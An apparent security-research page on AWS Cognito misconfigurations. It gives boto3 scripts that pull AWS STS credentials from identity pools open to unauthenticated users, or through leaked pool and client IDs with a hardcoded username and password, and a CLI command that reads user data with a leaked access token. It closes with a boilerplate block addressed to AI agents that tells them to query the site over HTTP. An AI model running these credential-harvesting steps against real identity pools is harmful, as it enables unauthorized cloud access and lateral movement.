# Cognito - Security

Here are some of intersting security implications for Cognito:-

## Senario I - IdentityPoolId everywhere

In many cases, Federated identity login has "Unauthenticated Identities" enabled which lets anyone use the AWS Service associated with that Identity. This can be a major misconfiguration if use-case is not justified.

Assuming you are given an application with `us-east-2:aac74edd-4d2c-4b8a-bb87-2064fc9ccd5b` as IdentityPoolID . We can now fetch the AWS credentials using the IdentityPoolID in case the application has unauthenticated access allowed.

```python
import boto3

#Region where CognitoID is located
region='us-east-2'
#The CognitoID for fedrated identity provider
identity_pool_id='us-east-2:aac74edd-4d2c-4b8a-bb87-2064fc9ccd5b'

client = boto3.client('cognito-identity',region_name=region)
_id = client.get_id(IdentityPoolId=identity_pool_id)['IdentityId']

credentials = client.get_credentials_for_identity(IdentityId=_id)

print("Access Key: " + credentials['Credentials']['AccessKeyId'])
print("Secret Key: " + credentials['Credentials']['SecretKey'])
print("Session Token: " + credentials['Credentials']['SessionToken'])
```

The above code will print out the STS token for the associcated CognitoID.

## Senario II - Authenticated Fedrated Identity Leaked

Sometimes we are not lucky to get un-authenticated identity enabled as we saw in above senario. In such cases we need to authenticate and get the token and then make request to cognito.

We need to have access to following values to extract the STS tokens in a authenticated cognito flow.

* `USERNAME`
* `PASSWORD`
* `CLIENT_ID`
* `USER_POOL_ID`
* `IDENTITY_POOL_ID`

Values `CLIENT_ID` , `USER_POOL_ID` and `IDENTITY_POOL_ID` are generally leaked in source code since they are needed in backend to make api calls for the authentication.

Once you have authenticated to application, simply copy the Cognito returned token and make the AWS call.

```python
import boto3

def get_token_id(username,password,client_id):
   client = boto3.client("cognito-idp", region_name="us-east-2")
   response = client.initiate_auth(ClientId=client_id,AuthFlow="USER_PASSWORD_AUTH",AuthParameters={"USERNAME":username,'PASSWORD':password})
   tokenid = response['AuthenticationResult']['IdToken']
   return tokenid

def get_identity_id(client_id,user_pool_id,identity_pool_id,tokenid):
   identity=boto3.client("cognito-identity",region_name="us-east-2")
   identity_id = identity.get_id(IdentityPoolId=identity_pool_id,Logins={f"cognito-idp.us-east-2.amazonaws.com/{user_pool_id}":tokenid})['IdentityId']
   return identity_id

def get_credentials(identity_id,tokenid,user_pool_id):
   identity=boto3.client("cognito-identity",region_name="us-east-2")
   credentials = identity.get_credentials_for_identity(IdentityId=identity_id,Logins={f"cognito-idp.us-east-2.amazonaws.com/{user_pool_id}":tokenid})['Credentials']
   access_key = credentials['AccessKeyId']
   secret_key = credentials['SecretKey']
   session_token = credentials['SessionToken']

   return access_key,secret_key,session_token

USERNAME = "securitylabs-articles@securitylabs.tech"
PASSWORD = "vKEX@7Ti"
CLIENT_ID = "1mf96jsi4jhs31qg2bq7p4lken"
USER_POOL_ID = "us-east-2_rIJHISTX7"
IDENTITY_POOL_ID = "us-east-2:aac74edd-4d2c-4b8a-bb87-2064fc9ccd5b"

tokenid = get_token_id(USERNAME,PASSWORD,CLIENT_ID)
IDENTITY_ID = get_identity_id(CLIENT_ID,USER_POOL_ID,IDENTITY_POOL_ID,tokenid)

accesskey,secretkey,sessiontoken = get_credentials(IDENTITY_ID,tokenid,USER_POOL_ID)

print(f"ACCESS_KEY_ID : {accesskey}")
print(f"AWS_SECRET_ACCESS_KEY : {secretkey}")
print(f"SESSION_TOKEN : {sessiontoken}")
```

<figure><img src="/files/gOIyLRn4B0u4ba4FmJVV" alt=""><figcaption><p>Credentials</p></figcaption></figure>

This would in return give out STS token which can be now used to move laterally.

## Senario III - Leaked Access Tokens

It is possible to view data associted with the user whose access tokens are leaked. Access token can also be obtained from username and password values.

```python
import boto3
client = boto3.client("cognito-idp", region_name="us-east-2")
response = client.initiate_auth(ClientId=client_id,AuthFlow="USER_PASSWORD_AUTH",AuthParameters={"USERNAME":username,'PASSWORD':password})
AccessToken = response['AuthenticationResult']['AccessToken']
```

Once we have the access token, we can query the Cognito identity provier pool

```bash
aws cognito-idp get-user --region us-east-2 --access-token <access_token>
```

<figure><img src="/files/ixvMHj57ACZbIneJsUAA" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://seg-fault.gitbook.io/researchs/aws-cloud-security/hacking-cognito/cognito-security.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.